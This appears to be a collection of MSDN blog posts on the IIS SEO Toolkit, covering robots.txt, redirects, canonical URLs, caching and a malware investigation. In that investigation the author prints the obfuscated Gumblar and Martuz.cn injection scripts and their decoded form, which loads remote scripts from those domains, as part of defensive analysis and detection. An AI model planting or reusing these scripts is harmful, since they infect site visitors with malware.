MSDN Blogs

Many sites today let users sign in to see some sort of personalized content, whether it's a forum, a news reader, or an e-commerce application. To simplify their users' lives, they usually let them log on from any page of the site they are currently looking at. Similarly, to keep navigation simple, Web sites usually generate dynamic links so that users can go back to the page they were on before visiting the login page, something like: <a href="/login?returnUrl=/currentUrl">Sign in</a>.

If your site has a login page you should definitely consider adding it to the Robots Exclusion list, since it is a good example of something you do not want a search engine crawler to spend its time on. Remember that crawlers give your site a limited amount of time, and you really want them to focus on what is important in your site.

Out of curiosity I searched for login.php and login.aspx and found over 14 million login pages… that is a lot of useless content in a search engine.

Another big reason is that URLs that vary with each page mean there will be hundreds of variations for crawlers to follow, like /login?returnUrl=page1.htm, /login?returnUrl=page2.htm, and so on: one extra login URL for every page, so you have roughly doubled the work for the crawler. Even worse, if you are not careful you can easily cause an infinite loop by adding the same "login link" to the login page itself: the link becomes /login?returnUrl=login, and when you follow it you get /login?returnUrl=login?returnUrl=login, and so on, with an ever-changing URL for each page on your site. Note that this is not hypothetical; it is a real example from a few famous Web sites (which I will not disclose). Of course crawlers are not that silly and will not crawl your Web site infinitely; they will stop after looking at the same resource /login a few hundred times. But it still reduces the time they spend looking at what really matters to your users.
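To make the loop concrete, here is a minimal Python sketch of a crawler repeatedly following the "Sign in" link on the login page itself. The login_link helper is hypothetical and only mirrors the naive link generation described above; it is not taken from any real site.

```python
def login_link(current_url: str) -> str:
    """Naively build a "Sign in" link that returns to the current page."""
    return "/login?returnUrl=" + current_url.lstrip("/")


def follow_login_links(start_url: str, hops: int) -> list:
    """Simulate a crawler following the login link found on each page."""
    visited = []
    url = start_url
    for _ in range(hops):
        url = login_link(url)  # the login page links to "itself" again
        visited.append(url)
    return visited


if __name__ == "__main__":
    for url in follow_login_links("/login", 3):
        print(url)
```

Every hop produces a URL the crawler has never seen before, even though the resource behind it is always /login.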

IIS SEO Toolkit

If you use the IIS SEO Toolkit it will detect the condition when the same resource (like login.aspx) is being used too many times (and only varying the Query String) and will give you a violation error like: Resource is used too many times.

 

So how do I fix this?

There are a few fixes, but by far the best thing to do is just add the login page to the Robots Exclusion protocol.

  1. Add the URL to /robots.txt. You can use the IIS Search Engine Optimization Toolkit to edit the robots file, or just drop in a file with something like:
    User-agent: *
    Disallow: /login
  2. Alternatively (or additionally) you can add a rel attribute with the nofollow value to the link to tell crawlers not to even try. Something like:
    <a href="/login?returnUrl=page" rel="nofollow">Log in</a>
  3. Finally, use the Site Analysis feature in the IIS SEO Toolkit to make sure you don't have this kind of behavior. It will automatically flag a violation when it identifies that the same "page" (with a different Query String) has already been visited over 500 times.
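If you want a quick sanity check of the robots.txt rule from step 1, the following sketch uses Python's standard urllib.robotparser module. The is_crawlable helper and the sample paths are assumptions made for illustration; a real crawler may interpret the file slightly differently.

```python
from urllib.robotparser import RobotFileParser

# The same rules shown in step 1.
ROBOTS_TXT = """\
User-agent: *
Disallow: /login
"""


def is_crawlable(path: str, robots_txt: str = ROBOTS_TXT, agent: str = "*") -> bool:
    """Return True if the given path may be fetched under the robots rules."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return parser.can_fetch(agent, path)


if __name__ == "__main__":
    for path in ("/login?returnUrl=page1.htm", "/products/page1.htm"):
        print(path, "->", "allowed" if is_crawlable(path) else "blocked")
```

Because Disallow matches by prefix, every /login?returnUrl=... variation is covered by the single rule.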

Summary

To summarize, always add the login page to the robots exclusion protocol file, otherwise you will end up:

  1. sacrificing valuable "search engine crawling time" on your site.
  2. spending unnecessary bandwidth and server resources.
  3. potentially even blocking crawlers from your content.

The other day a friend of mine who owns a Web site asked me to look at his Web site to see if I could spot anything weird since according to his Web Hosting provider it was being flagged as malware infected by Google.

My friend (who is not technical at all) talked to his Web site designer and mentioned the problem. The designer downloaded the HTML pages and looked for anything suspicious in them, but was not able to find anything. My friend then went back to his hosting provider, told them they had not found anything problematic, and asked whether it could be something in the server configuration, to which they replied sarcastically that it was probably ignorance on the part of his Web site designer.

Enter IIS SEO Toolkit

So of course the first thing I decided to do was crawl the Web site using Site Analysis in the IIS SEO Toolkit. This gave me a list of the pages and resources in his Web site. I knew that malware usually hides in either executables or scripts on the server, so I started by looking at the different content types shown in the "Content Types Summary" inside the Content reports in the dashboard page.

img01

I was surprised not to find a single executable, and to see only two very simple JavaScript files that did not look like malware in any way. From previous experience I knew that malware in HTML pages is usually hidden behind a funky-looking encoded script that uses the eval function to run the code. So I quickly ran a query for HTML pages that contain both the word eval and the word unescape. I know there are valid scripts that use those features, since they exist for a reason, but it was a good way to start narrowing down the pages.

Gumblar and Martuz.cn Malware in Sight

img02

After running the query as shown above, I got a set of HTML files which all returned status code 404 (NOT FOUND). Double-clicking any of them and looking at the HTML markup made it immediately obvious they were infected with malware. Look at the following markup:

<HTML>
<HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD>
<script language=javascript><!-- 
(function(AO9h){var x752='%';var qAxG='va"72"20a"3d"22Scr"69pt"45ng"69ne"22"2cb"3d"22Version("29"2b"22"2c"6a"3d"22"22"2cu"3dnav"69g"61"74or"2e"75ser"41gent"3bif((u"2e"69ndexO"66"28"22Win"22)"3e0)"26"26(u"2eindexOf("22NT"206"22"29"3c0)"26"26(document"2e"63o"6fkie"2ei"6e"64exOf("22mi"65"6b"3d1"22)"3c0)"26"26"28typ"65"6ff"28"7arv"7a"74"73"29"21"3dty"70e"6f"66"28"22A"22))"29"7b"7arvzts"3d"22A"22"3be"76a"6c("22i"66(wi"6edow"2e"22+a"2b"22)j"3d"6a+"22+a+"22Major"22+b+a"2b"22M"69no"72"22"2bb+a+"22"42"75"69ld"22+b+"22"6a"3b"22)"3bdocume"6e"74"2ewrite"28"22"3cs"63"72ipt"20"73rc"3d"2f"2fgum"62la"72"2ecn"2f"72ss"2f"3fid"3d"22+j+"22"3e"3c"5c"2fsc"72ipt"3e"22)"3b"7d';var Fda=unescape(qAxG.replace(AO9h,x752));eval(Fda)})(/"/g);
-->
</script><script language=javascript><!-- 
(function(rSf93){var SKrkj='%';var METKG=unescape(('var~20~61~3d~22S~63~72i~70~74Engine~22~2cb~3d~22Version()+~22~2cj~3d~22~22~2c~75~3dn~61v~69ga~74o~72~2e~75se~72Agen~74~3b~69f(~28u~2eind~65~78~4ff(~22Chro~6d~65~22~29~3c~30)~26~26(~75~2e~69ndexOf(~22Wi~6e~22)~3e0)~26~26(u~2e~69ndexOf(~22~4eT~206~22~29~3c0~29~26~26(doc~75~6dent~2ecook~69e~2ein~64exOf(~22miek~3d1~22)~3c~30)~26~26~28typeof(zrv~7at~73)~21~3dtyp~65~6ff(~22A~22~29))~7bzrv~7at~73~3d~22~41~22~3b~65~76al(~22i~66(w~69ndow~2e~22+a+~22)~6a~3dj+~22+~61+~22M~61jor~22+b~2b~61+~22~4dinor~22+~62+a~2b~22B~75ild~22~2bb+~22j~3b~22)~3bdocu~6d~65n~74~2e~77rit~65(~22~3cs~63r~69pt~20src~3d~2f~2f~6dar~22~2b~22tuz~2ec~6e~2f~76~69d~2f~3f~69d~3d~22+j+~22~3e~3c~5c~2fscr~69pt~3e~22)~3b~7d').replace(rSf93,SKrkj));eval(METKG)})(/\~/g);
 
--></script><BODY>
<H1>Not Found</H1>
The requested document was not found on this server.
<P>
<HR>
<ADDRESS>
Web Server at **********
</ADDRESS>
</BODY>
</HTML>

Notice those two ugly scripts that seem to be just a random set of numbers, quotes and letters? I do not believe I've ever met a developer that writes code like that in real web applications.

For those of you who, like me, do not particularly enjoy reading encoded JavaScript: what these two scripts do is unescape the funky-looking string and then execute it. I have decoded the script that would get executed and show it below to showcase how this malware works. Note how they special-case certain platforms and browsers (Windows but not "NT 6", and in the second script anything but Chrome) and then request a particular script that will cause the real damage.

var a = "ScriptEngine",
    b = "Version()+",
    j = "",
    u = navigator.userAgent;
if ((u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof (zrvzts) != typeof ("A"))) {
    zrvzts = "A";
    eval("if(window." + a + ")j=j+" + a + "Major" + b + a + "Minor" + b + a + "Build" + b + "j;");
    document.write("<script src=//gumblar.cn/rss/?id=" + j + "><\/script>");
}

And:

var a = "ScriptEngine",
    b = "Version()+",
    j = "",
    u = navigator.userAgent;
if ((u.indexOf("Chrome") < 0) && (u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof (zrvzts) != typeof ("A"))) {
    zrvzts = "A";
    eval("if(window." + a + ")j=j+" + a + "Major" + b + a + "Minor" + b + a + "Build" + b + "j;");
    document.write("<script src=//martuz.cn/vid/?id=" + j + "><\/script>");
}

Notice how both of them end up writing the actual malware script living in martuz.cn and gumblar.cn.
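If you want to decode this kind of payload yourself without running it, the trick is simply "replace the marker character with % and URL-decode". Here is a minimal Python sketch of that step; the decode_obfuscated name is my own, the two samples are only the first few characters of the strings shown above, and urllib.parse.unquote is used as a stand-in for JavaScript's unescape (they agree for plain %XX sequences like these).

```python
from urllib.parse import unquote


def decode_obfuscated(payload: str, marker: str) -> str:
    """Replace the marker with '%' and percent-decode, without executing anything."""
    return unquote(payload.replace(marker, "%"))


if __name__ == "__main__":
    # First script uses a double quote as the marker, the second uses a tilde.
    print(decode_obfuscated('va"72"20a"3d"22Scr"69pt"45ng"69ne"22', '"'))
    print(decode_obfuscated("var~20~61~3d~22S~63~72i~70~74Engine~22", "~"))
```

Both samples decode to the same opening statement of the scripts shown above.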

Final data

Now, this clearly means the site is infected with malware, and it seems clear that the problem is not in the Web application: the infection is in the error pages that the server returns when an error happens. To guide them with more specifics I next needed to determine which Web server they were using. That is as easy as inspecting the response headers in the IIS SEO Toolkit, which displayed something like the ones shown below:

Accept-Ranges: bytes
Content-Length: 2570
Content-Type: text/html
Date: Sat, 20 Jun 2009 01:16:23 GMT
Last-Modified: Sun, 17 May 2009 06:43:38 GMT
Server: Apache/2.2.3 (Debian) mod_jk/1.2.18 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8

With a big disclaimer that I know nothing about Apache, I then pointed them to their .htaccess and httpd.conf files and told them to look for the ErrorDocument settings, which would show them which files were infected and whether the problem was in their application or in the server.

Case Closed

It turns out that after they went back to their hoster with all this evidence, the hoster finally realized that the server was infected and was able to clean up the malware. The IIS SEO Toolkit helped me identify this quickly because it sees the Web site with the same eyes as a search engine would, following every link and letting me run easy queries to find information about it. In future versions of the IIS SEO Toolkit you can expect to find this kind of thing in much simpler ways, but for Beta 1, for those who care, here is the query that you can save in an XML file and use with "Open Query" to see if you are infected with this malware.

<?xml version="1.0" encoding="utf-8"?>
<query dataSource="urls">
  <filter>
    <expression field="ContentTypeNormalized" operator="Equals" value="text/html" />
    <expression field="FileContents" operator="Contains" value="unescape" />
    <expression field="FileContents" operator="Contains" value="eval" />
  </filter>
  <displayFields>
    <field name="URL" />
    <field name="StatusCode" />
    <field name="Title" />
    <field name="Description" />
  </displayFields>
</query>
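
If you do not have the toolkit at hand, the same heuristic is easy to approximate over pages you have already downloaded. This is only a rough Python sketch: the pages dictionary (URL to HTML text) is a hypothetical input, the match is case-insensitive by assumption, and like the query above it will also flag legitimate scripts that happen to use both functions.

```python
def looks_obfuscated(html: str) -> bool:
    """Heuristic from the query above: the page mentions both eval and unescape."""
    text = html.lower()
    return "eval" in text and "unescape" in text


def suspicious_urls(pages: dict) -> list:
    """Return the URLs whose HTML matches the heuristic, in sorted order."""
    return sorted(url for url, html in pages.items() if looks_obfuscated(html))


if __name__ == "__main__":
    pages = {
        "/index.htm": "<html><body>Hello</body></html>",
        "/missing.htm": "<script>var s=unescape(x);eval(s)</script>",
    }
    print(suspicious_urls(pages))
```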

The other day somebody asked me if there was a way to limit the amount of work that Site Analysis in the IIS SEO Toolkit causes on the server. This is interesting for a few reasons:

  • You might want to reduce the load that Site Analysis causes on your server at any given time.
  • You might have a denial-of-service detection system, such as our Dynamic IP Restrictions IIS module, that will start failing requests based on the number of requests in a certain amount of time.
  • Or, like me, you might have to go through a proxy that has a configured limit on the number of requests per minute you are allowed to issue.

In Beta 1 we do not support the Crawl-delay directive in the Robots Exclusion protocol; in future versions we will look at adding support for this setting. The good news is that Beta 1 does have a configurable setting that can help you achieve these goals, called Maximum Number of Concurrent Requests.

To set it:

  1. Go to the Site Analysis Reports page
  2. Select the option "Edit Feature Settings..." as shown in the next image
    EditFeatureSettings
  3. In the "Edit Feature Settings" dialog you will see the Maximum Number of Concurrent Requests option that you can set to any value from 1 to 16. The default value is 8 which means at any given time we will issue 8 requests to the server.
    MaxConcurrentRequests
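
To illustrate what a cap on concurrent requests means in practice, here is a small Python sketch of a crawler that never has more than a fixed number of requests in flight. It is not how Site Analysis is implemented; the crawl function, the ConcurrencyProbe class, and the fake fetch (which sleeps instead of touching the network) are all assumptions made for the example.

```python
import threading
import time
from concurrent.futures import ThreadPoolExecutor


def crawl(urls, fetch, max_concurrent_requests=8):
    """Fetch every URL with at most max_concurrent_requests running at once."""
    with ThreadPoolExecutor(max_workers=max_concurrent_requests) as pool:
        return list(pool.map(fetch, urls))


class ConcurrencyProbe:
    """Fake fetcher that records the peak number of simultaneous calls."""

    def __init__(self):
        self._lock = threading.Lock()
        self.active = 0
        self.peak = 0

    def fetch(self, url):
        with self._lock:
            self.active += 1
            self.peak = max(self.peak, self.active)
        time.sleep(0.01)  # stand-in for the network round trip
        with self._lock:
            self.active -= 1
        return url


if __name__ == "__main__":
    probe = ConcurrencyProbe()
    crawl(["/page%d" % i for i in range(20)], probe.fetch, max_concurrent_requests=2)
    print("peak concurrent requests:", probe.peak)
```

Lowering the limit trades total crawl time for a gentler load on the server or proxy.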

In the URL Rewrite forum somebody posted the question "are redirects bad for search engine optimization?". The answer is: not necessarily. Redirects are an important tool for Web sites, and if used in the right context they are actually a required tool. But first a bit of background.

What is a Redirect?

A redirect, in simple terms, is a way for the server to indicate to a client (typically a browser) that a resource has moved. It does this by using an HTTP status code and an HTTP Location header. There are different types of redirects, but the most common ones are:

  • 301 - Moved Permanently. This type of redirect signals that the resource has permanently moved and that any further attempts to access it should be directed to the location specified in the header.
  • 302 - Redirect or Found. This type of redirect signals that the resource is temporarily located in a different location, but any further attempts to access the resource should still go to the same original location.

Below is an example of the response sent from the server when requesting http://www.microsoft.com/SQL/

HTTP/1.1 302 Found
Connection: Keep-Alive
Content-Length: 161
Content-Type: text/html; charset=utf-8
Date: Wed, 10 Jun 2009 17:04:09 GMT
Location: /sqlserver/2008/en/us/default.aspx
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET

 

So what do redirects mean for SEO?

One of the most important factors in SEO is the concept called organic linking. In simple words, it means that your page gets extra points for every link that external Web sites have pointing to your page. So now imagine the Search Engine Bot is crawling an external Web site and finds a link pointing to your page (example.com/some-page), and when it tries to visit your page it runs into a redirect to another location (say example.com/somepage). Now the Search Engine has to decide whether it should add the original "some-page" to its index, whether it should "add the extra points" to the new location or to the original location, or whether it should just ignore it entirely. Well, the answer is not that simple, but a simplification of it could be:

  • If you return a 301 (Permanent Redirect) you are telling the search engine that the resource moved to a new location permanently, so all further traffic should be directed to that location. This clearly means that the search engine should ignore the original location (some-page) and index the new location (somepage), that it should add all the "extra points" to it, and that any further references to the original location should now be treated as if they pointed to the new one.
  • If you return a 302 (Temporary Redirect) the answer can depend on the search engine, but it's likely to index the original location and ignore the new location altogether (unless it is directly linked from other places), since the redirect is only temporary and the site could at any point stop redirecting and start serving the content from the original location. This of course makes it very ambiguous how to deal with the "extra points"; they will likely be added to the original location and not the new destination.

 

Enter IIS SEO Toolkit

The IIS Search Engine Optimization Toolkit has a few rules that look for different patterns related to redirects. The Beta version includes the following:

  1. The redirection did not include a location header. Believe it or not, there are a couple of applications out there that do not generate a Location header, which completely breaks the model of redirection. If your application is one of them, the toolkit will let you know.
  2. The redirection response results in another redirection. In this case it detected that your page (A) is linking to another page (B) which caused a redirection to another page (C) which resulted in another redirection to yet another page (D). It is trying to let you know that the number of redirects could significantly impact the SEO "bonus points", since the organic linking could be broken by all this jumping around, and that you should consider just linking from (A) to (D) or whatever page is supposed to be the final destination.
  3. The page contains unnecessary redirects. In this case it detected that your page (A) is linking to another page (B) in your Web site that resulted in a redirect to another page (C) within your Web site. Note that this is an informational rule, since there are valid scenarios where you would want this behavior, such as tracking page impressions or login pages. But in many cases you do not need the redirect, and since we detect that you own all three pages, we suggest you check whether it wouldn't be better to change the markup in (A) to point directly to (C) and avoid the (B) redirection entirely.
  4. The page uses a refresh definition instead of using redirection. Finally, IIS SEO will flag pages where the refresh meta-tag is being used as a means of causing a redirection. This practice is not recommended, since the tag does not carry any semantics that tell search engines how to process the content, and in many cases it is actually considered a tactic to confuse search engines, but I won't go there.
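
The first two rules are easy to picture as a walk over the responses your site returns. The following Python sketch is not the toolkit's implementation; redirect_chain and the SITE table (URL to status code and Location header) are hypothetical and only model the A, B, C, D example above.

```python
from typing import Dict, List, Optional, Tuple

# (status code, Location header or None)
Response = Tuple[int, Optional[str]]

# Hypothetical site: /b redirects to /c, which redirects again to /d.
SITE: Dict[str, Response] = {
    "/b": (302, "/c"),
    "/c": (301, "/d"),
    "/d": (200, None),
}


def redirect_chain(start: str, site: Dict[str, Response], limit: int = 10) -> List[str]:
    """Follow 301/302 responses from start and return every URL visited."""
    chain = [start]
    url = start
    while len(chain) <= limit:
        status, location = site.get(url, (200, None))
        if status not in (301, 302):
            break
        if location is None:
            # Rule 1: a redirect without a Location header.
            raise ValueError(url + " redirects without a Location header")
        if location in chain:
            raise ValueError("redirect loop at " + location)
        chain.append(location)
        url = location
    return chain


if __name__ == "__main__":
    chain = redirect_chain("/b", SITE)
    hops = len(chain) - 1
    print(" -> ".join(chain), "(%d redirects)" % hops)
```

A chain with more than one hop corresponds to rule 2: the link in (A) would be better off pointing straight at the last URL in the chain.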

So what does it look like? In the image below I ran Site Analysis against a Web site and it found a few of these violations (2 and 3).

IISSEORedirect1

Notice that when you double-click a violation it will tell you the details and give you direct access to the related URLs, so that you can look at the content and all the relevant information about them to make a decision. From that menu you can also see which other pages link to the different pages involved, as well as launch them in the browser if needed.

IISSEORedirect2

Similarly with all the other violations it tries to explain the reason it is being flagged as well as recommended actions to follow for each of them.

The IIS Search Engine Optimization Toolkit can also help you find all the different types of redirects and the locations where they are being used in a very easy way: just select Content->Status Code Summary in the Dashboard view and you will see all the different HTTP status codes received from your Web site. Notice in the image below how you can see the number of redirects (in this case 18 temporary redirects and 2 permanent redirects). You can also see how much content they accounted for, in this case about 2.5 KB (I've seen Web sites generate a large amount of useless content in redirect traffic, speaking of wasted bandwidth). You can double-click any of those rows to see the details of the URLs that returned that status code, and from there you can see who links to them, etc.

IISSEORedirect3

So what should I do?

  1. Know your Web site. Run Site Analysis against your Web site and see all the different redirects that are happening.
  2. Try to minimize redirections. With the knowledge gained in step 1, look for places where you can update your content to reduce the number of redirects.
  3. Use the right redirect. Understand the intent of the redirection you are trying to do and make sure you are using the right semantics (is it permanent or temporary?). Whenever possible prefer permanent redirects (301).
  4. Use URL Rewrite to easily configure them. URL Rewrite allows you to configure a set of rules, using both regular expressions and wildcards, that live along with your application (no administrative privileges required) and let you set the right redirection status code. A must for SEO. More on this in a future blog.

Summary

So going back to the original question: "are redirects bad for Search Engine Optimization?". Not necessarily; they are an important tool used by Web applications for many reasons, such as:

  • Canonicalization. To ensure that users access your site consistently either with www. or without www., use permanent redirects.
  • Page impressions and analytics. Use temporary redirects to ensure that the original link is preserved and counters work as expected.
  • Content reorganization. Whether you are changing your host due to a brand change or just renaming a page, make sure to use permanent redirects to keep your page rankings.
  • etc.

Just make sure you use the right semantics and don't abuse them with redirects to redirects, unnecessary redirects, or infinite loops.

Today somebody was running the IIS SEO Toolkit, and the Site Analysis feature flagged a lot of violations saying "The page contains multiple canonical formats.". The reason, apparently, is that he uses Query String parameters to pass contextual or other information between pages. This of course raises the question: does that mean query strings in general are bad news SEO-wise?

Well, the answer is not necessarily.

I will start by clarifying that this violation in Site Analysis means our algorithm detected that two URLs look like they have the same content. Note that we make no assumptions based on the URL (including Query String parameters). This kind of situation is bad for a couple of reasons:

  1. Because they look like the same page, Search Engines will probably choose one of them, index it as the real content, and discard the other one. The problem is that you are leaving this decision to Search Engines, which means some might choose the wrong version and end up using the one with Query String parameters instead of the clean one (not likely, though). Or even worse, they might end up indexing both of them as if they were different.
  2. When other Web sites look at your content and add links to it, some of them might end up using the URL with different Query String parameters and some of them not. This means organic linking will not give you the benefits it otherwise would. Remember, Search Engines give you "extra" points when somebody external references your page, but now you'll be splitting the earnings between "two pages" instead of a single canonical form.

Query Strings by themselves do not pose a terrible threat to SEO; most modern Search Engines deal OK with them. It's the organic linking and the potential abuse of Query Strings that could give you headaches.

Remember, Search Engines should make no assumptions based on the fact that a single "page" serves tons of content through a single Absolute Path and the use of Query Strings. This is typical in many cases, such as when using index.php, where pretty much every page on the site is served by the same resource using variations of Query Strings or path information.

 

So what should I do?

Well, there are several things you could do, but probably one of the easiest is to just tell Search Engines (more specifically crawlers or bots) not to index pages with Query String variations that are only meant for the application to pass state and not to specify different content. This can be done using the Robots Exclusion Protocol and its wildcard matching to tell crawlers not to follow any URLs that contain a '?'. Make sure you are not blocking URLs that are actually supposed to be indexed. To check, you can run the Site Analysis feature again; it will flag an informational message for each URL that is not visited due to the robots exclusion file.

User-agent: *
Disallow: /*?
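
To see which URLs a wildcard rule like this would block, here is a small Python sketch of the matching. It assumes the commonly supported wildcard extension ('*' matches any run of characters, a trailing '$' anchors the end of the URL); the helper names are my own, and individual crawlers may differ in the details. Note that Python's built-in urllib.robotparser is not used here because, as far as I know, it does not interpret wildcards.

```python
import re


def robots_pattern_to_regex(pattern: str) -> re.Pattern:
    """Translate a robots.txt path pattern with '*' and '$' into a regex."""
    anchored = pattern.endswith("$")
    if anchored:
        pattern = pattern[:-1]
    # Escape everything literally, then let each '*' match any characters.
    body = ".*".join(re.escape(part) for part in pattern.split("*"))
    return re.compile("^" + body + ("$" if anchored else ""))


def is_disallowed(path: str, pattern: str = "/*?") -> bool:
    """Return True if the path matches the Disallow pattern."""
    return robots_pattern_to_regex(pattern).match(path) is not None


if __name__ == "__main__":
    for path in ("/products.aspx", "/products.aspx?sort=name", "/index.php?id=3"):
        print(path, "->", "blocked" if is_disallowed(path) else "allowed")
```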

 

In summary, try to keep canonical formats yourself and don't leave any guesses to Search Engines, because some of them might get it wrong. There is a new way of specifying the canonical form in your markup, the rel="canonical" link, but it is very recent (as in 2009) and some Search Engines do not support it (I believe the top three do, though):

<link rel="canonical" href="http://www.my-site.com/my-canonical-url" />

In the Beta 2 version of the IIS SEO Toolkit we will support this tag and have better detection of these canonical issues. So stay tuned.

Another way to solve this is to use URL Rewrite so that you can easily redirect or rewrite your URLs to get rid of the Query Strings and use more SEO-friendly URLs.
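
As a rough way to find candidates for cleanup, you can group the URLs from a crawl by their form without the Query String. The Python sketch below uses the standard urllib.parse module; the function names and sample URLs are made up, and it assumes the query string only carries state. If your site selects content through the query string (the index.php case above), this grouping would be wrong.

```python
from collections import defaultdict
from urllib.parse import urlsplit, urlunsplit


def strip_query(url: str) -> str:
    """Return the URL without its query string and fragment."""
    parts = urlsplit(url)
    return urlunsplit((parts.scheme, parts.netloc, parts.path, "", ""))


def group_by_canonical(urls) -> dict:
    """Map each query-less URL to the list of variations that collapse onto it."""
    groups = defaultdict(list)
    for url in urls:
        groups[strip_query(url)].append(url)
    return dict(groups)


if __name__ == "__main__":
    crawl = [
        "http://www.my-site.com/page",
        "http://www.my-site.com/page?sessionid=123",
        "http://www.my-site.com/other",
    ]
    for canonical, variations in group_by_canonical(crawl).items():
        print(canonical, len(variations))
```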

One easy way to enhance the experience of users visiting your Web site, by increasing the perceived performance of navigating it, is to reduce the number of HTTP requests required to display a page. There are several techniques for achieving this, such as merging scripts into a single file or merging images into one big image, but by far the simplest is making sure that you cache as much as you can in the client. This will not only reduce rendering time but will also reduce the load on your server and your bandwidth consumption.

Unfortunately, the different types of caches and the different ways of setting them can be quite confusing and esoteric. So my recommendation is to pick one way and use it all the time, and that way is the HTTP 1.1 Cache-Control header.

So first of all, how do I know if my application is well behaved and sending the right headers so browsers can cache its content? You can use a network monitor or tools like Fiddler or wfetch to look at all the headers and figure out if they are being sent correctly. However, you will soon realize that this process won't scale for a site with hundreds if not thousands of scripts, styles and images.

Enter Site Analysis - IIS Search Engine Optimization Toolkit

To figure out if your images are sending the right headers you can follow the next steps:

  1. Install the IIS Search Engine Optimization Toolkit from http://www.iis.net/extensions/SEOToolkit
  2. Launch InetMgr.exe (IIS Manager) and crawl your Web site. For more details on how to do that, refer to the article "Using Site Analysis to crawl a web site".
  3. Once you are in the Site Analysis dashboard view you can start a new query by using the menu "Query->New Query" and adding the following criteria:
    1. Is External - Equals - False -> To include only the files that come from your Web site
    2. Status code - Equals - OK -> To include only successful requests
    3. Content Type Normalized - Begins With - image/ -> To include only images
    4. Headers - Not Contains - Cache-Control: -> To include only the ones that do not have the Cache-Control header specified
    5. Headers - Not Contains - Expires: -> To include only the ones that do not have the Expires header
    6. Press Execute, and this will display all the images in your Web site that are not specifying any caching behavior.

Alternatively you can just save the following query as "ImagesNotCached.xml" and use the Menu "Query->Open Query" for it. This should make it easy to open the query for different Web sites or keep testing the results when making changes:

<?xml version="1.0" encoding="utf-8"?>
<query dataSource="urls">
  <filter>
    <expression field="IsExternal" operator="Equals" value="False" />
    <expression field="StatusCode" operator="Equals" value="OK" />
    <expression field="ContentTypeNormalized" operator="Begins" value="image/" />
    <expression field="Headers" operator="NotContains" value="Cache-Control:" />
    <expression field="Headers" operator="NotContains" value="Expires:" />
  </filter>
  <displayFields>
    <field name="URL" />
    <field name="ContentTypeNormalized" />
    <field name="StatusCode" />
  </displayFields>
</query>
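
For readers who prefer to see the filter as code, here is the same set of conditions written as a Python predicate. The record layout (a dictionary with is_external, status, content_type and headers keys) is purely hypothetical and is not the toolkit's data model.

```python
def missing_cache_headers(record: dict) -> bool:
    """Mirror the query: internal, successful image with no caching headers."""
    headers = record["headers"]
    return (
        not record["is_external"]
        and record["status"] == 200
        and record["content_type"].startswith("image/")
        and "Cache-Control:" not in headers
        and "Expires:" not in headers
    )


if __name__ == "__main__":
    records = [
        {"url": "/logo.gif", "is_external": False, "status": 200,
         "content_type": "image/gif", "headers": "Content-Length: 120\r\n"},
        {"url": "/banner.png", "is_external": False, "status": 200,
         "content_type": "image/png", "headers": "Cache-Control: max-age=604800\r\n"},
    ]
    print([r["url"] for r in records if missing_cache_headers(r)])
```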

How do I fix it?

In IIS 7 this is trivial to fix: you can just drop a web.config file in the directory where your images, scripts and CSS styles live, specifying the caching behavior for them. The following web.config will send the Cache-Control header so that the browser caches the responses for up to 7 days.

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <staticContent>
      <clientCache cacheControlMode="UseMaxAge" cacheControlMaxAge="7.00:00:00" />
    </staticContent>
  </system.webServer>
</configuration>
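
The cacheControlMaxAge value is written as days.hours:minutes:seconds, while the max-age directive of Cache-Control is expressed in seconds. As a worked example of the arithmetic, this Python sketch converts one to the other; max_age_seconds is a hypothetical helper that only handles the simple d.hh:mm:ss and hh:mm:ss forms.

```python
from datetime import timedelta


def max_age_seconds(value: str) -> int:
    """Convert a 'd.hh:mm:ss' (or 'hh:mm:ss') value into seconds."""
    days, _, clock = value.rpartition(".")
    hours, minutes, seconds = (int(part) for part in clock.split(":"))
    delta = timedelta(days=int(days or 0), hours=hours, minutes=minutes, seconds=seconds)
    return int(delta.total_seconds())


if __name__ == "__main__":
    print("Cache-Control: max-age=%d" % max_age_seconds("7.00:00:00"))
```

Seven days is 7 x 24 x 60 x 60 = 604800 seconds, which is the max-age you should expect to see on the responses.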

You can also do this through the UI (IIS Manager) by going into the "HTTP Response Headers" feature -> Set Common Headers..., or through any of our APIs using managed code, JavaScript or your favorite language:

http://www.iis.net/ConfigReference/system.webServer/staticContent/clientCache

Furthermore, using the same query above in the Query Builder, you can group by directory and find the directories where it is really worth adding this. It is just a matter of clicking the "Group by" button and adding URL-Directory to the Group by clauses. Not surprisingly, in my case it flags the App_Themes directory, where I store 8 images.

IIS SEO

 

Finally, what about 304's?

One thing to note is that even if you do not do anything, most modern browsers will use conditional requests to reduce latency when they have a copy in their cache. As an example, imagine the browser needs to display logo.gif as part of displaying test.htm and that image is available in its cache. The browser will issue a request like this:

GET /logo.gif HTTP/1.1
Accept: */*
Referer: http://carlosag-client/test.htm
Accept-Language: en-us
User-Agent: (whatever-browser-you-are-using)
Accept-Encoding: gzip, deflate
If-Modified-Since: Mon, 09 Jun 2008 16:58:00 GMT
If-None-Match: "01c13f951cac81:0"
Host: carlosagdev:8080
Connection: Keep-Alive

Note the use of the If-Modified-Since header, which tells the server to send the actual data only if it has changed after that time. In this case it hasn't, so the server responds with status code 304 (Not Modified):

HTTP/1.1 304 Not Modified
Last-Modified: Mon, 09 Jun 2008 16:58:00 GMT
Accept-Ranges: bytes
ETag: "01c13f951cac81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 07 Jun 2009 06:33:51 GMT

Even though this helps, it still requires a whole roundtrip to the server. The response is short, but it can still have a significant impact if the rendering of the page is waiting for it, as in the case of a CSS file that the browser needs in order to display the page correctly, or an <img> tag that does not include the dimensions (width and height attributes) and so requires the actual image to determine the required space (one reason why you should always specify the dimensions in markup to increase rendering performance).
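
The server's side of that exchange boils down to a small decision. The Python sketch below is a simplification under my own assumptions, not how IIS implements it: status_for is a hypothetical helper, the ETag comparison is an exact string match, and If-None-Match is given precedence over If-Modified-Since when both are present.

```python
from email.utils import parsedate_to_datetime


def status_for(request_headers: dict, etag: str, last_modified: str) -> int:
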